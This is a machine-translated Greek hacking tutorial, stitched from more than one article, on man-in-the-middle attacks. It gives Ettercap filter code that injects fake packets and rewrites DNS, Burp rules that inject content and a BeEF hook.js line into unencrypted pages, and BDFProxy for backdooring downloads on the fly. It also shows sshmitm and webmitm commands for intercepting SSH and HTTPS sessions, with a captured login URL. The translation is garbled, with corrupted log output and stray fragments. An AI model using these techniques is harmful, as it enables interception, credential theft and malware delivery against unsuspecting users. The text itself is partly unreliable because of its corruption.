(DATA.data + 40 == "ette") { log(DATA.data, "./logfile"); } # вставить файл после указанного пакета if (tcp.src == 21 && search(DATA.data, "root")) { inject("./fake_response"); } # целиком заменить пакет на другой if (tcp.src == 23 && search(DATA.data, "microsoft")) { drop(); inject("./fake_telnet"); } # Изменение бинарных данных используя внешнюю программу if (udp.dst == 53 && pcre_regex(DATA.data, ".*\x03com\x00.*")) { log(DATA.data, "/tmp/payload"); drop(); execinject("/bin/sed "s/\x03com\x00/\x02my\x04page\x02de\x00/g" /tmp/payload"); udp.len += 7; exec("/bin/rm /tmp/payload"); msg("faked"); } # фильтровать только указанный IP адрес if (ip.src == "192.168.0.2") { drop(); } # делать то же самое для IPv6 if (ipv6.src == "2001:db8::1") { drop(); } # комбинируем IPv4 и IPv6 if (eth.proto == IP && ip.dst == "192.168.0.2") { msg("drop IPv4"); drop(); } if (eth.proto == IP6 && ipv6.dst == "2001:db8::1") { msg("drop IPv6"); drop(); } # транслировать tcp пакеты с порта 80 на 81 if (tcp.dst == 80) { tcp.dst -= 1; tcp.dst += 2; } # найти и покалечить пакеты ESP if (ip.proto == ESP) { DATA.data = "DEADDECAF"; }

4.2 Αντικατάσταση δεδομένων με χρήση Burp

Εκκινούμε το Ettercap και το Burp όπως περιγράφεται στην παράγραφο 1.2 ή στην παράγραφο 2.2.

Στο Burp, μεταβείτε στο Proxy -> Options. Εκεί βρίσκουμε το Match and Replace. Κάντε κλικ στην Προσθήκη για να προσθέσετε έναν νέο κανόνα.

Η κεφαλίδα αιτήματος είναι η κεφαλίδα αιτήματος
Σώμα αιτήματος - φορέας αιτήματος
Επικεφαλίδα απόκρισης - κεφαλίδα απόκρισης
Σώμα απόκρισης - σώμα απόκρισης
Αίτημα ονόματος παραμέτρου - Αίτημα ονόματος παραμέτρου
Αίτημα τιμής παραμέτρου - Αίτημα τιμής παραμέτρου
Αίτημα πρώτης γραμμής - Πρώτη γραμμή του αιτήματος

Εάν πρέπει να αλλάξετε τα δεδομένα που μεταδίδονται με τη μέθοδο GET, τότε αυτό ισχύει για τις κεφαλίδες.

Στη σήμανση HTML υπάρχει επίσης ένα τέτοιο πράγμα όπως το head (head tag). Αυτά που αναφέρονται ακριβώς παραπάνω δεν έχουν καμία σχέση με αυτόν τον τίτλο. Λίγο πιο πάνω μιλάμε για κεφαλίδες πακέτων. Εάν θέλετε να αλλάξετε το περιεχόμενο σελίδες HTML, τότε θα πρέπει πάντα να επιλέγετε το σώμα απόκρισης αντί για την κεφαλίδα Αίτημα, ακόμα κι αν πρόκειται να αλλάξετε τα περιεχόμενα της ετικέτας κεφαλής (για παράδειγμα, τον τίτλο).

Εάν δεν είστε εξοικειωμένοι με κανονικές εκφράσεις, τότε, κατ 'αρχήν, δεν υπάρχει τίποτα να ανησυχείτε: η HTML συγχωρεί πολλά και ό,τι δεν καταλαβαίνει, απλώς αγνοεί - μπορείτε να το χρησιμοποιήσετε. Αν ξέρεις να χρησιμοποιείς κανονικές εκφράσεις, τότε σε σέβομαι.)))

Για παράδειγμα, ας δημιουργήσουμε έναν νέο κανόνα, αλλάζοντας την κεφαλίδα αιτήματος σε σώμα απόκρισης. Στον ίδιο τον κανόνα θα αλλάξουμε

Χωρίς τίτλο

Επιλέξτε το πλαίσιο αντιστοίχισης Regex.

Τώρα σε όλους τους ιστότοπους (χωρίς HTTPS) ο τίτλος θα είναι Χωρίς τίτλο:

Εισαγάγετε μια αυθαίρετη γραμμή μετά την ετικέτα σώματος (θα είναι η πρώτη γραμμή στο κείμενο). Η κεφαλίδα αιτήματος αλλάζει σε σώμα απόκρισης. Αλλάζουμε

Επιλέξτε το πλαίσιο αντιστοίχισης Regex.

Στην επάνω δεξιά γωνία (ανάλογα με τη διάταξη) εμφανίζεται η επιγραφή "I am cool!". Μπορείτε να εισαγάγετε CSS, κώδικα JavaScript, οποιοδήποτε κείμενο - οτιδήποτε. Μπορείτε γενικά να αφαιρέσετε τα πάντα από τη σελίδα και στη συνέχεια να τη γεμίσετε με το δικό σας περιεχόμενο - όλα εξαρτώνται από τη φαντασία σας.

Η ιδέα ήταν να τροποποιηθεί ελαφρά κάθε φόρμα, έτσι ώστε τα δεδομένα να αποστέλλονται στον αρχικό διακομιστή και στον διακομιστή του εισβολέα (εφαρμογή πολλαπλής υποβολής για κάθε φόρμα). Έχοντας όμως αιτιολογήσει ότι εάν τα μεταδιδόμενα δεδομένα δεν είναι κρυπτογραφημένα και έχουμε πρόσβαση σε αυτά, τότε τα βλέπουμε ήδη, δεν χρειάζεται να τα στείλουμε σε κανένα διακομιστή. Ωστόσο, εάν κάποιος χρειάζεται ένα πραγματικά λειτουργικό παράδειγμα αποστολής δεδομένων από μια φόρμα σε πολλούς διακομιστές ταυτόχρονα.

5. Σύνδεση στο BeEF

Για να αρχίσουμε να χρησιμοποιούμε τις δυνατότητες του BeEF, πρέπει να ενσωματώσουμε ένα αρχείο JavaScript στον κώδικα HTML, συνήθως μια γραμμή όπως:

Οι επόμενες δύο μέθοδοι διαφέρουν μόνο ως προς τη μέθοδο ενσωμάτωσης αυτής της συμβολοσειράς.

5.1 Σύνδεση BeEF χρησιμοποιώντας φίλτρα Ettercap

[η ενότητα θα ετοιμαστεί αργότερα]

5.2 Σύνδεση BeEF με Burp

Πρέπει να ξεκινήσετε ακριβώς όπως γράφτηκε στην παράγραφο 4.2. Μόνο αντί να αντικαταστήσουμε τις κεφαλίδες και να προσθέσουμε κείμενο στον ιστότοπο, θα εφαρμόσουμε κώδικα JavaScript με τη μορφή γραμμής:

Στην περίπτωσή μου, αυτό το αρχείο είναι διαθέσιμο στην IP 192.168.1.36 στη θύρα 3000. Το αρχείο ονομάζεται hook.js (μπορεί να αλλάξει στις ρυθμίσεις). Εκείνοι. στην περίπτωσή μου πρέπει να κάνω ένεση στη γραμμή:

Αυτό μπορεί να γίνει, για παράδειγμα, δημιουργώντας έναν νέο κανόνα, αλλάζοντας την κεφαλίδα αιτήματος σε σώμα απόκρισης. Η αντικατάσταση πρέπει να γίνει στον ίδιο τον κώδικα HTML

Τέλεια, όταν ανοίγετε έναν ιστότοπο που δεν έχει HTTPS, εισάγεται κώδικας JavaScript στον κώδικα HTML, ο οποίος σας επιτρέπει να συλλέγετε πληροφορίες μέσω ενός συνδεδεμένου προγράμματος περιήγησης και να πραγματοποιείτε διάφορες επιθέσεις:

6. Λοίμωξη με κερκόπορτες

Μπορείτε να αντικαταστήσετε και να μολύνετε εκτελέσιμα αρχεία χρησιμοποιώντας και τα δύο φίλτρα Ettercap [τα οποία για κάποιο λόγο δεν λειτουργούν πλέον] και χρησιμοποιώντας εφαρμογές τρίτων. Για παράδειγμα, το BDFProxy μπορεί να το κάνει αυτό εν κινήσει. Δυστυχώς, το BDFProxy εξακολουθεί να παρασύρεται από την ενημέρωση του Backdoor Factory του Απριλίου 2016: το πακέτο libmproxy μετονομάστηκε σε mitmproxy στην Python. Για το BDFProxy, το πακέτο libmproxy είναι μια απαραίτητη εξάρτηση· χωρίς αυτό το πακέτο το πρόγραμμα δεν θα ξεκινήσει. Επομένως, τώρα, πριν από την «επισκευή» του BDFProxy, είναι αδύνατο να το χρησιμοποιήσετε, γιατί ακόμη και με εγκατεστημένο το Backdoor Factory, το πρόγραμμα BDFProxy παραπονιέται για την απουσία της βιβλιοθήκης libmproxy...

Μια παρόμοια λειτουργία μπορεί να γίνει με το Burp Suite. Παρουσιάζεται ο αλγόριθμος βήμα προς βήμα· δεν έχει νόημα να τον ξαναγράψουμε σε αυτήν την ενότητα.

7. Χρήση πρόσθετων Ettercap

Μπορείτε να βρείτε πληροφορίες σχετικά με τα πρόσθετα Ettercap. Υπάρχουν πολλά πρόσθετα· αυτά που περιγράφονται παρακάτω μου φαίνονται τα πιο ενδιαφέροντα.

Τα πρόσθετα μπορούν να συνδεθούν κατά την εκκίνηση του Ettercap, υπάρχει μια επιλογή για αυτό:

P, --plugin εκτελέστε αυτό

Τα πρόσθετα μπορούν επίσης να φορτωθούν από το GUI:

[ΥΛΙΚΟ ΥΠΟ ΠΡΟΕΤΟΙΜΑΣΙΑ]

7.1 arp_cop

Αναφέρει ύποπτη δραστηριότητα ARP παρακολουθώντας παθητικά αιτήματα/απαντήσεις ARP. Μπορεί να αναφέρει απόπειρες δηλητηρίασης ARP ή απλές διενέξεις IP ή αλλαγές IP. Εάν δημιουργείτε μια αρχική λίστα κεντρικών υπολογιστών, η προσθήκη θα λειτουργεί με μεγαλύτερη ακρίβεια.

Ettercap -TQP arp_cop //

Ένα παράδειγμα πραγματικής ανίχνευσης πλαστογράφησης ARP:

Επεκτείνουν

Mial@HackWare-Mint ~ $ sudo ettercap -TQP arp_cop // κωδικός πρόσβασης για mial: ettercap 0.8.2 πνευματικά δικαιώματα 2001-2015 Ομάδα ανάπτυξης Ettercap Ακρόαση στις: eth0 -> 08:00:27:A3:08:416/19.2. 255.255.255.0 fe80::a00:27ff:fea3:84a/64 Η ανατομή SSL χρειάζεται μια έγκυρη δέσμη ενεργειών "redir_command_on" στο αρχείο etter.conf Τα δικαιώματα μειώθηκαν στο EUID 65534 EGID 65534... 33 θύρες παρακολούθησης 4 protocol50 33 protocol50 plugins δακτυλικό αποτύπωμα προμηθευτή 1766 tcp OS 2182 γνωστές υπηρεσίες Τυχαιοποίηση 255 κεντρικών υπολογιστών για σάρωση... Σάρωση ολόκληρης της μάσκας δικτύου για 255 κεντρικούς υπολογιστές... * |====== ============== =============================>| 100,00 % 3 κεντρικοί υπολογιστές προστέθηκαν στη λίστα κεντρικών υπολογιστών... Έναρξη Ενοποιημένου sniffing... Μόνο κείμενο Ενεργοποιήθηκε η διεπαφή... Πατήστε "h" για ενσωματωμένη βοήθεια Ενεργοποίηση προσθήκης arp_cop... arp_cop: εκτελείται προσθήκη... arp_cop: (νέος κεντρικός υπολογιστής ) 192.168.1.1 arp_cop: (ΠΡΟΕΙΔΟΠΟΙΗΣΗ) 192.168.1.35 προσποιείται ότι είναι 192.168.1.1 arp_cop: (ΠΡΟΕΙΔΟΠΟΙΗΣΗ) 192.168.1.35 προσποιείται ότι είναι 192.168.1.35 προσποιείται ότι είναι 192.168.1.1.1 προσποιείται ότι είναι 192.168.1.1.1 s να είναι 192.168.1.1 arp_cop: ( ΠΡΟΕΙΔΟΠΟΙΗΣΗ ) 192.168.1.35 προσποιείται ότι είναι 192.168.1.1 arp_cop: (ΠΡΟΕΙΔΟΠΟΙΗΣΗ) 192.168.1.35 προσποιείται ότι είναι 192.168.1.1 arp_cop: (ΠΡΟΕΙΔΟΠΟΙΗΣΗ) 191.381p. : (WA RNING) 192.168.1.35 προσποιείται be 192.168 .1.1 arp_cop: (ΠΡΟΕΙΔΟΠΟΙΗΣΗ) 192.168.1.35 προσποιείται ότι είναι 192.168.1.1 arp_cop: (ΠΡΟΕΙΔΟΠΟΙΗΣΗ) 192.168.1.35 προσποιείται ότι είναι 192.168.1.35 προσποιείται ότι είναι 192.168.1.1.35 προσποιείται ότι είναι 192.168.1.1.1 s να είναι 192.1 68.1.1 arp_cop: ( ΠΡΟΕΙΔΟΠΟΙΗΣΗ) 192.168 .1.35 προσποιείται ότι είναι 192.168.1.1 arp_cop: (ΠΡΟΕΙΔΟΠΟΙΗΣΗ) 192.168.1.35 προσποιείται ότι είναι 192.168.1.1 arp_cop: (ΠΡΟΕΙΔΟΠΟΙΗΣΗ) 191.38.1. : (ΠΡΟΕΙΔΟΠΟΙΗΣΗ) 192.1 68.1.35 προσποιείται be 192.168.1.1 arp_cop: (ΠΡΟΕΙΔΟΠΟΙΗΣΗ) 192.168.1.35 προσποιείται ότι είναι 192.168.1.1 arp_cop: (ΠΡΟΕΙΔΟΠΟΙΗΣΗ) 192.168.1.35 προσποιείται ότι είναι 192.168.1.35 προσποιείται ότι είναι 192.168.1.1. να είναι 192.168.1. 1 arp_cop: (ΠΡΟΕΙΔΟΠΟΙΗΣΗ) 192.168.1.35 προσποιείται ότι είναι 192.168.1.1 arp_cop: (ΠΡΟΕΙΔΟΠΟΙΗΣΗ) 192.168.1.35 προσποιείται ότι είναι 192.168.1.1 arp_cop: (ΠΡΟΕΙΔΟΠΟΙΗΣΗ) 192.168.1.35 προσποιείται ότι είναι 192.168.1.1 arp_cop: (ΠΡΟΕΙΔΟΠΟΙΗΣΗ) 191.319p. : (ΠΡΟΕΙΔΟΠΟΙΗΣΗ) 192.168.1.3 5 προσποιείται να είναι 192.168.1.1 arp_cop: (ΠΡΟΕΙΔΟΠΟΙΗΣΗ) 192.168.1.35 προσποιείται ότι είναι 192.168.1.1 arp_cop: (ΠΡΟΕΙΔΟΠΟΙΗΣΗ) 192.168.1.35 προσποιείται ότι είναι 192.168.1.35 προσποιείται ότι είναι 192.168.1.1.35 προσποιείται ότι είναι 192.168.1.1.1 s να είναι 192.168.1.1 arp_cop : ( ΠΡΟΕΙΔΟΠΟΙΗΣΗ) 192.168.1.35 προσποιείται ότι είναι 192.168.1.1 arp_cop: (ΠΡΟΕΙΔΟΠΟΙΗΣΗ) 192.168.1.35 προσποιείται ότι είναι 192.168.1.1 arp_cop: (ΠΡΟΕΙΔΟΠΟΙΗΣΗ. ΠΡΟΕΙΔΟΠΟΙΗΣΗ. (ΠΡΟΕΙΔΟΠΟΙΗΣΗ) 192.168.1.35 προσποιείται ότι είναι 192. 168.1.1 arp_cop: (ΠΡΟΕΙΔΟΠΟΙΗΣΗ) 192.168.1.35 προσποιείται ότι είναι 192.168.1.1 arp_cop: (ΠΡΟΕΙΔΟΠΟΙΗΣΗ) 192.168.1.35 προσποιείται ότι είναι 192.168.1.1.1 arp.1919. 2.168.1.1 arp_cop: (ΠΡΟΕΙΔΟΠΟΙΗΣΗ ) 192.168.1.35 προσποιείται ότι είναι 192.168.1.1 arp_cop: (ΠΡΟΕΙΔΟΠΟΙΗΣΗ) 192.168.1.35 προσποιείται ότι είναι 192.168.1.1 arp_cop: (ΠΡΟΕΙΔΟΠΟΙΗΣΗ) 192.168.16.1.p. NING ) 192.168.1.35 προσποιείται ότι είναι 192.168 . 1.1 arp_cop: (ΠΡΟΕΙΔΟΠΟΙΗΣΗ) 192.168.1.35 προσποιείται ότι είναι 192.168.1.1 arp_cop: (ΠΡΟΕΙΔΟΠΟΙΗΣΗ) 192.168.1.35 προσποιείται ότι είναι 192.168.1.1 προσποιείται ότι είναι 192.168.1.1 192.168.1.1 προσποιείται ότι είναι 192.168.1.1.1 arp_cop. 16 8.1.1 arp_cop: (ΠΡΟΕΙΔΟΠΟΙΗΣΗ) 192.168. 1.35 προσποιείται ότι είναι 192.168.1.1 arp_cop: (ΠΡΟΕΙΔΟΠΟΙΗΣΗ) 192.168.1.35 προσποιείται ότι είναι 192.168.1.1 arp_cop: (ΠΡΟΕΙΔΟΠΟΙΗΣΗ) 192.168.1.1.p. ING) 192.16 8.1.35 προσποιείται ότι είναι 192.168 .1.1.................................

7.2 αυτόματη προσθήκη

Θα προσθέσει αυτόματα νέα θύματα καθώς συνδέονται με την επίθεση mitm poisoning ARP. Αναζητά αιτήματα ARP στο τοπικό δίκτυο και εάν εντοπιστεί, το πρόσθετο θα προσθέσει τον κεντρικό υπολογιστή στη λίστα των θυμάτων, εάν η λίστα είχε καθοριστεί ως ΣΤΟΧΟΣ. Ο κεντρικός υπολογιστής προστίθεται όταν ένα αίτημα arp είναι ορατό από αυτόν.

7,3 chk_poison

Ελέγχει για να δει εάν οι μονάδες arp etch στο ettercap είναι επιτυχείς. Στέλνει πλαστά πακέτα ηχούς ICMP σε όλα τα θύματα δολώματος ενώ προσποιείται ότι είναι κάθε θύμα. Μπορεί να συλλάβει μια απόκριση ICMP με τη διεύθυνση MAC ως προορισμό, πράγμα που σημαίνει ότι το δόλωμα μεταξύ των δύο στόχων είναι επιτυχές. Ελέγχει και τις δύο διαδρομές κάθε σύνδεσης.

7.4 dns_spoof

Αυτό το πρόσθετο διακόπτει τα αιτήματα DNS και απαντά με μια πλαστή (ψεύτικη) απάντηση. Μπορείτε να επιλέξετε σε ποια διεύθυνση θα ανταποκρίνεται το πρόσθετο επεξεργαζόμενοι το αρχείο etter.dns. Το πρόσθετο παρεμποδίζει αιτήματα A, AAAA, PTR, MX, WINS, SRV και TXT. Εάν ήταν αίτημα A, τότε το όνομα αναζητείται στο αρχείο και επιστρέφεται η διεύθυνση IP (μπορείτε να χρησιμοποιήσετε χαρακτήρες μπαλαντέρ στο όνομα).

Το ίδιο ισχύει και για τα αιτήματα AAAA.

7.5 find_conn

Ένα πολύ απλό πρόσθετο που ακούει αιτήματα ARP για να σας δείξει όλους τους στόχους με τους οποίους θέλει να επικοινωνήσει ο κεντρικός υπολογιστής. Μπορεί επίσης να σας βοηθήσει να βρείτε διευθύνσεις σε άγνωστα LAN.

Ettercap -TQzP find_conn ettercap -TQu -i eth0 -P find_conn

7.6 find_ettercap

Προσπαθεί να αναγνωρίσει πακέτα ettercap που αποστέλλονται στο LAN. Μπορεί να είναι χρήσιμο για τον εντοπισμό κάποιου που προσπαθεί να χρησιμοποιήσει το ettercap. Μην βασίζεστε σε αυτό 100%, καθώς τα τεστ λειτουργούν μόνο σε συγκεκριμένες ακολουθίες/αριθμούς ταυτότητας.

7.7 scan_poisoner

Θα ελέγξουμε για να δούμε αν κάποιος δολώνει μεταξύ οποιουδήποτε από τους οικοδεσπότες στη λίστα και εμάς. Αρχικά, ελέγχει εάν δύο κεντρικοί υπολογιστές στη λίστα έχουν το ίδιο Διεύθυνση MAC. Αυτό μπορεί να σημαίνει ότι ο ένας από αυτούς μας δηλητηριάζει προσποιούμενος ότι είναι ο άλλος. Μπορεί να δημιουργήσει πολλά ψευδώς θετικά σε ένα περιβάλλον μεσολάβησης-arp. Πρέπει να δημιουργήσετε μια λίστα κεντρικών υπολογιστών για να εκτελέσετε αυτόν τον έλεγχο. Μετά από αυτό, στέλνει πακέτα icmp echo σε κάθε κεντρικό υπολογιστή στη λίστα και ελέγχει εάν η διεύθυνση mac της πηγής απόκρισης είναι διαφορετική από τη διεύθυνση που αποθηκεύσαμε στη λίστα με αυτήν την IP. Αυτό μπορεί να σημαίνει ότι κάποιος δολώνει αυτόν τον κεντρικό υπολογιστή προσποιούμενος ότι έχει τη διεύθυνση IP μας και προωθεί τα πακέτα που υποκλαπούν σε εμάς. Δεν μπορείτε να εκτελέσετε αυτήν την ενεργή δοκιμή σε μη προσβλητική λειτουργία.

Ettercap -TQP scan_poisoner //

7.8 search_promisc

Προσπαθεί να βρει αν κάποιος ρουθουνίζει (ακούει) σε ακατάλληλη λειτουργία. Στέλνει δύο διαφορετικά κακώς σχηματισμένα αιτήματα arp σε κάθε στόχο στη λίστα κεντρικού υπολογιστή και περιμένει για απαντήσεις. Εάν η απόκριση προήλθε από τον κεντρικό υπολογιστή προορισμού, είναι λίγο πολύ πιθανό ότι ο στόχος έχει την κάρτα δικτύου σε ακατάλληλη λειτουργία. Μπορεί να δημιουργήσει ψευδείς συναγερμούς. Μπορείτε να το εκτελέσετε είτε από τη γραμμή εντολών είτε από το μενού προσθηκών. Δεδομένου ότι ακούει για απαντήσεις arp, θα είναι καλύτερο να μην τις χρησιμοποιείτε κατά την αποστολή αιτημάτων arp.

Ettercap -TQP search_promisc /192.168.0.1/ ettercap -TQP search_promisc //

Ένα παράδειγμα επιτυχούς εικασίας δύο καρτών δικτύου σε ακατάλληλη λειτουργία:

Επεκτείνουν

Root@HackWare:~# ettercap -TQP search_promisc ettercap 0.8.2 πνευματικά δικαιώματα 2001-2015 Ομάδα ανάπτυξης του Ettercap Ακρόαση στις: eth0 -> 08:00:27:AF:30:B9 192.168.1.3500/25 27ff:feaf:30b9/64 Η ανατομή SSL χρειάζεται ένα έγκυρο σενάριο "redir_command_on" στο αρχείο etter.conf Το Ettercap ενδέχεται να μην λειτουργεί σωστά. Το /proc/sys/net/ipv6/conf/eth0/use_tempaddr δεν έχει οριστεί σε 0. Τα δικαιώματα μειώθηκαν στο EUID 65534 EGID 65534... 33 πρόσθετα 42 ανατομείς πρωτοκόλλου 57 θύρες παρακολουθούνται 20388 mac προμηθευτής δακτυλικών αποτυπωμάτων 18 OS 176 γνωστές υπηρεσίες : δεν καθορίστηκαν σενάρια, δεν εκκινήθηκε! Τυχαιοποίηση 255 κεντρικών υπολογιστών για σάρωση... Σάρωση ολόκληρης της μάσκας δικτύου για 255 κεντρικούς υπολογιστές... * |============================= ==================================>| 100,00% Προστέθηκαν 5 κεντρικοί υπολογιστές στη λίστα κεντρικών υπολογιστών... Έναρξη Ενοποιημένου sniffing... Μόνο κείμενο Ενεργοποιήθηκε η διεπαφή... Πατήστε "h" για ενσωματωμένη βοήθεια Ενεργοποίηση προσθήκης search_promisc... search_promisc: Αναζήτηση promisc NIC... Λιγότερο πιθανώς sniffing NIC : - 192.168.1.36 - 192.168.1.34 Πιθανότατα sniffing NIC: - ΚΑΝΕΝΑ Κλείσιμο διεπαφής κειμένου... Τερματισμός ettercap... Ο καθαρισμός Lua ολοκληρώθηκε! Το ενιαίο ρουφήξιμο σταμάτησε.

7.9 sslstrip

Κατά τη διάρκεια μιας επίθεσης SSL mitm, το ettercap αντικαθιστά το πραγματικό πιστοποιητικό SSL με το δικό του. Το πλαστό πιστοποιητικό δημιουργείται εν κινήσει και όλα τα πεδία συμπληρώνονται σύμφωνα με το πραγματικό πιστοποιητικό που παρουσιάζει ο διακομιστής.

(62%)

(56.5%)

(ΤΥΧΑΙΟ - 0,2%)

Σε αυτό το άρθρο θα δούμε επιθέσεις όπως το Man-in-the-Middle, ή μάλλον τη μέθοδο
ανακατεύθυνση της κυκλοφορίας SSH και HTTP χρησιμοποιώντας την επίθεση Man in the Middle. Ας μην τραβήξουμε τη γάτα από την ουρά, αλλά ας ασχοληθούμε.

Ο άνθρωπος στη μέση (εν συντομία MitM, από τα ρωσικά απλά - "επίθεση του μεσάζοντα" ή "άνθρωπος
στη μέση") είναι ένας τύπος επίθεσης που βασίζεται στην ανακατεύθυνση της κυκλοφορίας μεταξύ δύο μηχανών για την αναχαίτιση πληροφοριών - περαιτέρω μελέτη, καταστροφή ή τροποποίηση. Έτσι, το πρώτο πράγμα που χρειαζόμαστε είναι το πακέτο dsniff (θα δείτε έναν σύνδεσμο προς το πακέτο στο το τέλος του άρθρου). Γιατί Ναι, επειδή αυτό το πακέτο περιέχει όλα τα απαραίτητα βοηθητικά προγράμματα, συμπεριλαμβανομένου του sshmitm (ανακατεύθυνση της κυκλοφορίας SSH) και του httpmitm (ανακατεύθυνση της κυκλοφορίας HTTP), τα οποία μπορούν να παρακάμψουν το ακόλουθο σχήμα ασφαλείας: από όσο γνωρίζετε, πρωτόκολλα με η κρυπτογράφηση δεδομένων είναι αρκετά - είναι "ασφαλείς" (η κρυπτογράφηση βοηθά :)) και δεν επιτρέπουν τη διεξαγωγή επιθέσεων "πάνω" από το επίπεδο δικτύου. Το κλειδί κρυπτογράφησης είναι άγνωστο στον χάκερ - είναι αδύνατο να αποκρυπτογραφήσει τα δεδομένα και εισάγετε και μια εντολή. Όλα φαίνονται καλά, αλλά ορίστε πώς
αφού τα προγράμματα επίθεσης MitM (sshmitm και httpmitm) από το πακέτο dsniff μπορούν να παρακάμψουν αυτό το σύστημαασφάλεια (μπορείτε να παρακάμψετε σχεδόν τα πάντα). Όλα αυτά γίνονται σύμφωνα με την ακόλουθη αρχή:
ο ενδιάμεσος κεντρικός υπολογιστής λαμβάνει το αίτημα από τον πελάτη, «λέγοντάς» του ότι είναι ο διακομιστής και στη συνέχεια συνδέεται με τον πραγματικό διακομιστή.
Το δεύτερο πράγμα που χρειαζόμαστε είναι ίσια χέρια, το τέταρτο - το πιο σημαντικό - είναι η επιθυμία και, φυσικά, ένα θύμα, δηλαδή ο υπολογιστής στον οποίο θα επιτεθούμε.

Ανακατεύθυνση της κυκλοφορίας SSH

Αφού ετοιμάσατε τα εργαλεία, καταλάβατε τι ήταν τι και γιατί :). Λάβετε το sshmitm - τώρα θα ανακατευθύνουμε την κυκλοφορία SSH (όλα όσα δεν καταλάβατε με το θεωρητικό μέρος - διαβάστε παραπάνω)
χρησιμοποιώντας το, εκμεταλλευόμενοι τις αδυναμίες του σημερινού PKI (υποδομή δημόσιου κλειδιού - ένα σύστημα διαχείρισης κλειδιών που βασίζεται σε
μέθοδοι ασύμμετρης κρυπτογραφίας). Ας δούμε τη σύνταξη
sshmitm:

sshmitm [-d] [-I] [-p port] host

ρε
να επιτρέπεται η έξοδος εντοπισμού σφαλμάτων (δηλαδή πιο προηγμένη λειτουργία)

Εγώ
πειρατεία συνεδρίας

Θύρα P
θύρα ακρόασης

πλήθος
διεύθυνση του απομακρυσμένου κεντρικού υπολογιστή του οποίου οι συνεδρίες θα υποκλαπούν

Λιμάνι
θύρα στον απομακρυσμένο κεντρικό υπολογιστή

Όλα φαίνονται απλά και καλόγουστα - δεν υπάρχει τίποτα περίπλοκο :). Ας αρχίσουμε να εφαρμόζουμε την επίθεση!

# sshmitm server.target.gov // καθορίστε τον διακομιστή SSH σας
sshmitm: αναμετάδοση στον διακομιστή server.target.gov

Δεδομένου ότι δεν έχουμε ένα πραγματικό κλειδί SSH, ο διερμηνέας εντολών του επιτέθηκε
θα εμφανίσει ένα αίτημα για έλεγχο του κλειδιού κεντρικού υπολογιστή, όλα θα μοιάζουν κάπως έτσι:

clientmachine$ server.target.gov
@ΠΡΟΕΙΔΟΠΟΙΗΣΗ: Η ΑΝΑΓΝΩΡΙΣΗ ΑΠΟΣΤΑΣΕΙΣ HOST ΕΧΕΙ ΑΛΛΑΞΕΙ! @
ΕΙΝΑΙ ΠΙΘΑΝΟ ΚΑΠΟΙΟΣ ΝΑ ΚΑΝΕΙ ΚΑΤΙ ΑΣΧΟΛΟ!
Κάποιος θα μπορούσε να σας κρυφακούει αυτή τη στιγμή (επίθεση άνθρωπος στη μέση)!
Είναι επίσης πιθανό το κλειδί κεντρικού υπολογιστή RSA να έχει μόλις αλλάξει.
Επικοινωνήστε με τον διαχειριστή του συστήματός σας.

Και τότε ο χρήστης θα αποφασίσει αν θα συνδεθεί ή όχι. Εάν ναι, τότε θα έχουμε τον πλήρη έλεγχο της συνεδρίας SSH.
ΑΛΛΑ! Εάν ο χρήστης δεν έχει συνδεθεί ποτέ σε αυτό το αυτοκίνητο, μπορεί να εμφανιστεί το ακόλουθο μήνυμα:

Η αυθεντικότητα του κεντρικού υπολογιστή "server.target.gov" δεν μπορεί να εξακριβωθεί
Το δακτυλικό αποτύπωμα κλειδιού RSA είναι
μπλα:μπλα:μπλα;μπλα;μπλα.........
Είστε βέβαιοι ότι θέλετε να συνεχίσετε τη σύνδεση (ναι/όχι);

Εδώ ο χρήστης έχει επίσης δύο επιλογές - να συνδεθεί ή όχι. Αν ναι, τότε ανακόψαμε τη συνεδρία, αν όχι, τότε αλίμονο... :(.
Σε γενικές γραμμές, η επίθεση ήταν επιτυχής εάν ο χρήστης συνδεόταν και το sshmitm, με τη σειρά του, κατέγραφε όλα τα περάσματα και τις συνδέσεις και με πολύ ευανάγνωστο τρόπο :)
Φυσικά, αυτός δεν είναι ο μόνος υποκλοπής συνεδρίας SSH, αλλά μόλις εξοικειωθείτε με αυτό, μπορείτε εύκολα να κυριαρχήσετε έναν άλλο :)

Ανακατεύθυνση επισκεψιμότητας HTTP

Τώρα θα ανακατευθύνουμε την κυκλοφορία HTTP. Και πάλι, θα χρειαστούμε ένα προηγουμένως επιλεγμένο εργαλείο: httpmitm, το οποίο ακούει τις θύρες 80 (HTTP -) και 443 (HTTPS -), παρεμποδίζει τα αιτήματα WEB, στη συνέχεια συνδέεται στον διακομιστή και προωθεί τα αιτήματα στον υπολογιστή-πελάτη. Το πρόγραμμα δημιουργεί επίσης κλειδιά SSL και πιστοποιητικά SSL χρησιμοποιώντας OpenSSL. Στη συνέχεια, μετά από προσπάθεια
συνδέεται με τον ιστότοπο (target.gov), το πρόγραμμα περιήγησης θα ελέγξει το πιστοποιητικό SSL. Δεδομένου ότι τα πιστοποιητικά δεν ταιριάζουν, το πρόγραμμα περιήγησης του χρήστη θα προειδοποιήσει σχετικά
λανθασμένο πιστοποιητικό SSL. Από την πλευρά του επιτιθέμενου θα μοιάζει κάπως έτσι:

#webmitm -d
webmitm: αναμετάδοση με διαφάνεια
webmitm: νέα σύνδεση από
GET [link]/uzerz.php?user=hellknights&password=neskaju1qwerty HTTP/[έκδοση]
Τύπος σύνδεσης]
Διοργανωτής: www.target.gov
User-Agent: [σύστημα, πληροφορίες προγράμματος περιήγησης]
[κλπ, κλπ, κλπ]
Cookie: [cookies]

Έτσι φαίνονται όλα απ' έξω -
η σύνδεση SSL παρεμποδίζεται, καταγράφοντας μη κρυπτογραφημένα δεδομένα.

συμπέρασμα

Σε αυτό το άρθρο, εξετάσαμε την ανακατεύθυνση της κυκλοφορίας SSH και HTTP χρησιμοποιώντας την επίθεση Man in the Middle - σαφώς, λεπτομερώς, εν συντομία. Άλλοι ανακατευθυντές HTTP και SSH
Θα κατακτήσετε την κυκλοφορία χρησιμοποιώντας το MitM γρήγορα, αν έχετε κατακτήσει και αυτά :)). Αν κάτι ήταν ασαφές, τότε...

Υποκλοπή δεδομένων μέσω δικτύου είναι η λήψη οποιασδήποτε πληροφορίας από μια απομακρυσμένη συσκευή υπολογιστή. Μπορεί να αποτελείται από τα προσωπικά στοιχεία του χρήστη, τα μηνύματά του και τα αρχεία των επισκέψεων στον ιστότοπο. Η λήψη δεδομένων μπορεί να πραγματοποιηθεί με λογισμικό υποκλοπής spyware ή με χρήση sniffers δικτύου.

Το Spyware είναι ειδικό λογισμικό που μπορεί να καταγράψει όλες τις πληροφορίες που μεταδίδονται μέσω ενός δικτύου από έναν συγκεκριμένο σταθμό εργασίας ή συσκευή.

